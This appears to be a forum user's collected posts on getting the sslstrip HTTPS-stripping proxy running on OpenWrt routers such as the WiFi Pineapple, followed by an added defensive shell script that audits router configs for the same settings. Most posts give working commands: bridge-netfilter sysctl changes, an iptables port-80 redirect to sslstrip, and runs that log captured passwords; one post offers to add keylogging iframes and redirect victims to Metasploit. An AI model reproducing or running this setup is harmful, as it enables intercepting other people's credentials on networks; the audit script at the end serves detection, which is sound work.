thaihenry

Everything posted by thaihenry

  1. For anyone interested, I got sslstrip .9 working by remarking the following lines so that the deprecate module is not required:

         nano /opt/usr/lib/python2.7/site-packages/twisted/web/__init__.py

         # -*- test-case-name: twisted.web.test -*-
         # Copyright (c) Twisted Matrix Laboratories.
         # See LICENSE for details.

         """
         Twisted Web: a L{web server} (including an L{HTTP implementation} and a
         L{resource model}) and a L{web client}.
         """

         from twisted.web._version import version
         from twisted.python.versions import Version
         #from twisted.python.deprecate import deprecatedModuleAttribute

         __version__ = version.short()

         #deprecatedModuleAttribute(
         #    Version('Twisted', 11, 1, 0),
         #    "Google module is deprecated. Use Google's API instead",
         #    __name__, "google")
  2. I don't think it is a problem with sslstrip, although updating to version 8 helps. The main problem is that bridging is not turned on. To turn it on:

         vi /etc/sysctl.conf

     Change to:

         # disable bridge firewalling by default
         net.bridge.bridge-nf-call-arptables=1
         net.bridge.bridge-nf-call-ip6tables=1
         net.bridge.bridge-nf-call-iptables=1

     Should only be one IP redirect:

         iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

     sslstrip is a proxy, which means that you can do all kinds of things with it besides getting passwords!!!
  3. Interesting, I definitely have it working on my wr703n with the latest version of openwrt (development). I am pretty sure I had it working on the Mark4 also. Did you reboot? I wonder if there are different versions of the firmware? Is your linux version 3.3?
  4. Yes that is correct, I have not done much testing on it otherwise. You just need to manually install the prerequisites as having SET install them for you will not work. Also have quite a few other python tools working great like mitmproxy
  5. See my earlier post on this. By default iptables does not work on a bridge interface for openwrt. see my earlier post on sslstrip on how to fix that. Frankly I don't see how anyone can get sslstrip working on the Jasager without this fix.
  6. urlsnarf listens only on port 80 and 8080. Once you start sslstrip, traffic is redirected to port 10000 by default, so urlsnarf does not see any traffic. I have not tried it, but if you get sslstrip to run on port 8080, urlsnarf may then pick up the traffic.
  7. In case you cannot exchange them, keep in mind that as long as you are running openwrt, there is still a lot that you can do with the boards. Most of the utilities will run fine from the command line, however you will not get the pineapple firmware (interface) on it. I would be interested to know if 16 Megs memory is enough to run SSLstrip properly though.
  8. Instead of using ettercap, (the filters don't work properly) use sslstrip to write an iframe in the response body. If you provide me with your java script code, I can modify sslstrip for you to do that, so that your sslstrip module will also do key logging! This can also be taken further to do all kinds of things like for example sending users to a computer running metasploit, set etc. while you are at it might as well do a SET module since I have SET working on my router.
  9. For existing users of the Pineapple that want to get sslstrip working properly:

     1. Edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!). Change the 0 to 1 in the following section:

            vi /etc/sysctl.conf

            # disable bridge firewalling by default
            net.bridge.bridge-nf-call-arptables=1
            net.bridge.bridge-nf-call-ip6tables=1
            net.bridge.bridge-nf-call-iptables=1

     2. Depending on what version you have, make sure that the firewall is disabled.

     3. Install the following packages in case they were never installed:

            opkg -dest usb install python
            opkg -dest usb install zope-interface
            opkg -dest usb install twisted-web
            opkg -dest usb install pyopenssl

     If you want to get the latest version of sslstrip:

     4. Download sslstrip:

            wget http://www.thoughtcr...trip-0.6.tar.gz
            tar zxvf sslstrip-0.6.tar.gz
            cd sslstrip-0.6

     5. Fixes to get sslstrip working properly:

            ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7
            touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

     6. If you are using the sslstrip module then you will need to install sslstrip:

            python setup.py install

        Otherwise you can just run it from the command line:

            iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
            python sslstrip.py -a -k -f -w /usb/log.txt
  10. To answer my own post and get the latest version of sslstrip (v.9) working: comment out line 97 and line 98 of ServerConnection.py in the sslstrip sub-folder.

          # elif (key.lower() == 'set-cookie'):
          #     self.client.responseHeaders.addRawHeader(key, value)

      However, I have tested versions 6-9 of sslstrip. While versions 8 and 9 work, there is a problem (only on openwrt) that prevents the web page being loaded after passwords have been captured, most likely because of "Compatibility changes for recent versions of twisted", which means that twisted is not the latest version on openwrt. Versions 6-7 work fine. Also, killsessions, which never worked properly for me on versions 8 and 9, does seem to work well on 6 and 7!
  11. This is a guide on how to get sslstrip working on openwrt. This should work on ANY router that supports openwrt with USB ports and 32 MB of memory or more. A fast CPU would help, however sslstrip runs fine on a 400 MHz CPU. I have tested this on the pineapple mark 4 and on the tplink WR703N.

      1. Make sure you install a firmware with a version 3.0 or greater kernel. At this time only the development snapshots (firmware) of openwrt have linux 3.3. iptables may not be properly supported on earlier versions.

      2. Install USB support; this is very well documented elsewhere on this site.

      3. Edit /etc/profile:

             vi /etc/profile

         a. Change the existing path statement to the following:

                export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/opt/bin:/opt/sbin:/opt/usr/bin:/opt/usr/sbin

         b. Add this line:

                export LD_LIBRARY_PATH=/lib:/usr/lib:/opt/lib:/opt/usr/lib

      4. Edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!). Change the 0 to 1 in the following section:

             vi /etc/sysctl.conf

             # disable bridge firewalling by default
             net.bridge.bridge-nf-call-arptables=1
             net.bridge.bridge-nf-call-ip6tables=1
             net.bridge.bridge-nf-call-iptables=1

      5. Disable the firewall using the command line or web interface (or modify iptables for proper routing).

      6. Install the following packages:

             opkg -dest usb install python
             opkg -dest usb install zope-interface
             opkg -dest usb install twisted-web
             opkg -dest usb install pyopenssl

         Optional but very useful:

             opkg -dest usb install nano
             opkg -dest usb install screen

         -dest usb may be different on your router depending on how you set up your usb disk and swap. Don't forget to add dest usb /usb in your software configuration.

      7. Download sslstrip:

             wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz
             tar zxvf sslstrip-0.6.tar.gz
             cd sslstrip-0.6

      8. Fixes to get sslstrip working properly:

             ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7
             touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

         Optional for nano and screen:

             ln -s /usb/usr/share/terminfo /usr/share/terminfo

      9. To get sslstrip running:

             iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
             python sslstrip.py -a -k -f -w /usb/log.txt

      Once you have everything working properly, you can install sslstrip as usual (python setup.py install) so that you can use your favorite scripts on openwrt.
  12. Just in case someone can take this further, this is the error message when running version 9 after a few seconds:

          sslstrip 0.9 by Moxie Marlinspike running...
          Traceback (most recent call last):
            File "/opt/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
              return callWithContext({"system": lp}, func, *args, **kw)
            File "/opt/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
              return context.call({ILogContext: newCtx}, func, *args, **kw)
            File "/opt/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
              return self.currentContext().callWithContext(ctx, func, *args, **kw)
            File "/opt/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
              return func(*args,**kw)
          --- <exception caught here> ---
            File "/opt/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
              why = getattr(selectable, method)()
            File "/opt/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
              return self.protocol.dataReceived(data)
            File "/opt/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
              why = self.lineReceived(line)
            File "/opt/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
              self.handleHeader(key, val)
            File "/usb/sslstrip-0.9/sslstrip/ServerConnection.py", line 98, in handleHeader
              self.client.responseHeaders.addRawHeader(key, value)
          exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'
  13. According to moxie, these are the changes that he made:

      Changes in 0.8 (04/24/11)
        - Major speed enhancements.
        - Compatibility changes for recent versions of twisted.
        - Support for stripping URLs with explicit port specifications (ie: foo.com:443)
        - A number of small bug fixes.

      Changes in 0.7 (12/18/09)
        - Fixed a minor bug that could prevent favicon spoofing from working correctly (thanks Simon Nicolussi).

      Changes in 0.6 (9/22/09)
        - Fixed a silly bug in specifying the listen port with -l

      Here is how to get it working:

          cd /usb
          wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz
          tar xfv ssl*
          cd ssl*

      You can either run sslstrip version 8 directly or you can install it in the system. To run without installing:

          iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
          python sslstrip.py -k -f -w /usb/sslstrip.log

      I like to use screen so that I can run sslstrip in one screen and then see the output in the other:

          tail /usb/sslstrip.log -f

      To install sslstrip:

          python setup.py install
  14. sslstrip version 8 is running perfectly on openwrt. There is a problem with the latest version 9 of sslstrip:

          root@OpenWrt:/usb/sslstrip-0.9# python sslstrip.py
          Traceback (most recent call last):
            File "sslstrip.py", line 27, in <module>
              from twisted.web import http
            File "/opt/usr/lib/python2.7/site-packages/twisted/web/__init__.py", line 14, in <module>
              from twisted.python.deprecate import deprecatedModuleAttribute
          ImportError: No module named deprecate

      I tried installing the zope.deprecate module with no luck.
  15. I think I found a solution but I need others to also test this. By default iptables does not work on the bridge interface br-lan. It is turned off and any redirect command will have no effect. https://forum.openwrt.org/viewtopic.php?pid=143700#p143700

      I have edited /etc/sysctl.conf:

          # disable bridge firewalling by default
          net.bridge.bridge-nf-call-arptables=1
          net.bridge.bridge-nf-call-ip6tables=1
          net.bridge.bridge-nf-call-iptables=1

      and redirect to port 10000 now works properly:

          iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

      On the pineapple I believe the firewall is turned off. If you are using other versions of openwrt you will need to turn off the firewall (or modify the rules) so that traffic gets properly routed to the internet.
  16. talot, Thank you for your input, Are you saying that if you don't redirect port 443 to 10000 that sslstrip does not work? That would be very interesting. I am trying to get sslstrip working on the pineapple without ICS and with the IP address changed to my local LAN going through a different lan router just the same as if I was running sslstrip on my laptop. But no luck so far. I have had no problem in the past getting sslstrip to work on a regular computer. Just wondering if IP tables has some kind of bug on this version of Linux (since I have the same problem on the stock openwrt firmware on the tplink 703 a similar router) or is it that I am ignorant about the way that routers work, and sslstrip needs to have different settings when run on a router? Any help would be appreciated and would help to expand the different ways that the pineapple could be used as I don't see much benefit from running sslstrip when you have to connect to ICS on another computer. In that case why not just run sslstrip from that computer?
  17. I think you are mistaken, sslstrip does not decrypt anything. It is a transparent proxy that fools the client and server into thinking that they are exchanging information using encryption. If you are going to quote a web page, it might as well be the author of the tool, Moxie Marlinspike: http://www.thoughtcrime.org/software/sslstrip/

          How does this work? First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example). At this point, sslstrip receives the traffic and does its magic.

      His site has clear details of how this works. There is no mention of redirecting traffic from port 443 to the sslstrip port. That would not be possible because ssl traffic cannot be decrypted without a key. From my understanding sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. You can do the same thing with other transparent proxies.
  18. Digininja Thank you for your help. Tplink has a very nice atheros based USB adapter; TL-WN722N. Very good for injection. I found them to be more reliable than the alphas, which I rarely use.
  19. Hi Telot,

      Why would this be necessary? This is ssl traffic and can't be decrypted:

          iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

      Also I am having a problem with direction:

          iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

      It seems that only the traffic from browsing the pineapple's interface gets redirected to port 10000, not the traffic going through the router. Unfortunately I don't know enough about IP tables to fix this problem. Any help would be appreciated.

      Finally, I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used?
  20. Thank you for your reply and your work on this module, however unfortunately it does not work for me. It did work when the network settings were set to default and I was using ICS. But I need to use it standalone on a lan without going through a computer. I looked through the bash script and the PHP code and only found the one standard iptables redirect rule. Did the installation of the module also add some code or config changes somewhere else outside the module? I would appreciate it if you can help me get this working standalone, on a lan without a computer running ICS. When I run sslstrip manually, and use

          iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

      for some reason the traffic does not get directed to port 10000. It flows right through.
  21. What ip tables rules did you use to get sslstrip working on a local lan (no ICS)? When I use the standard rule:

          iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

      no traffic seems to be rerouted to sslstrip (except the traffic from the web interface). I should add that my pineapple's address is 192.168.0.xx with the gateway on the same LAN and internet access works fine. I would think that the main purpose of having sslstrip on a router is to not have to use a computer for internet connection and either connect directly to a LAN through ethernet, using 3G or as a repeater using wifi. Also is there any reason why version 6 of sslstrip is being used? I can run the latest version with no problem, but again the traffic is not being routed to port 10000 with the above ip rule. Thanks in advance.
  22. How about that step-by-step guide, would be very helpful for everyone else with a mac.
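
The bridge-netfilter sysctl and the port-80 REDIRECT rule that recur in these posts are also what a defender would look for when checking whether a router has been set up to intercept HTTP. The following is an added example, not code from the posts or from sslstrip: it audits a copy of a router's /etc/sysctl.conf and its iptables-save output. The function names bridge_nf_enabled, http_redirects and audit are hypothetical, and the sample input is constructed.

```shell
# Added example: audit a sysctl.conf copy and iptables-save output for the two
# settings these posts combine. All sample data below is constructed.

# Print bridge-nf-call-* keys whose last (effective) assignment is 1.
bridge_nf_enabled() {
    awk -F= '
        /^[ \t]*#/ { next }                            # skip comments
        /^[ \t]*net\.bridge\.bridge-nf-call-/ {
            k = $1; v = $2; gsub(/[ \t]/, "", k); gsub(/[ \t]/, "", v)
            val[k] = v                                 # last assignment wins
        }
        END { for (n in val) if (val[n] == "1") print n }' "$1" | sort
}

# Print "80->PORT" for each nat/PREROUTING REDIRECT rule on destination port 80.
http_redirects() {
    awk '
        /^\*/ { table = substr($0, 2) }                # "*nat" opens a table
        table == "nat" && $1 == "-A" && $2 == "PREROUTING" {
            dport = ""; target = ""; to = ""
            for (i = 3; i < NF; i++) {
                if ($i == "--dport" || $i == "--destination-port") dport = $(i + 1)
                if ($i == "-j") target = $(i + 1)
                if ($i == "--to-ports" || $i == "--to-port") to = $(i + 1)
            }
            if (target == "REDIRECT" && dport == "80") print "80->" to
        }' "$1"
}

# $1 = sysctl.conf copy, $2 = iptables-save output; prints one verdict line.
audit() {
    redirects=$(http_redirects "$2" | tr '\n' ' ')
    if [ -z "$redirects" ]; then
        echo "OK: no port-80 REDIRECT in nat/PREROUTING"
    elif bridge_nf_enabled "$1" | grep -q 'bridge-nf-call-iptables$'; then
        echo "ALERT: bridged HTTP is redirected: $redirects"
    else
        echo "WARN: REDIRECT present but bridge netfilter is off: $redirects"
    fi
}

# Constructed sample input, written to a scratch directory.
SAMPLE=$(mktemp -d)
printf '%s\n' '# disable bridge firewalling by default' \
    'net.bridge.bridge-nf-call-arptables=0' \
    'net.bridge.bridge-nf-call-iptables = 1' > "$SAMPLE/sysctl.conf"
printf '%s\n' '*nat' ':PREROUTING ACCEPT [0:0]' \
    '-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000' \
    'COMMIT' '*filter' '-A INPUT -p tcp --dport 80 -j ACCEPT' 'COMMIT' > "$SAMPLE/rules"
audit "$SAMPLE/sysctl.conf" "$SAMPLE/rules"
```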